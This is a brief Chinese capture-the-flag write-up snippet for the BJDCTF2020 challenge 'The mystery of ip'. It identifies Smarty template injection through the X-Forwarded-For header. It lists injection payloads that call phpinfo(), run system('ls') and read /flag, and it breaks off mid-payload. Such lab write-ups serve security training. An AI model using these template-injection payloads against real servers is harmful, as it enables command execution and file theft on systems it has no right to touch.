[BJDCTF2020]The mystery of ip

知识点 SSTI smarty 抓包,根据题目猜想X-Forwarded-For处可能有问题,测试了一下,存在模板注入   测试了一下,是smarty注入 smarty注入payload {if phpinfo()}{/if} {if system('ls')}{/if} { readfile('/flag') } {if show_source('/flag')}{/if} {if system
相关文章
相关标签/搜索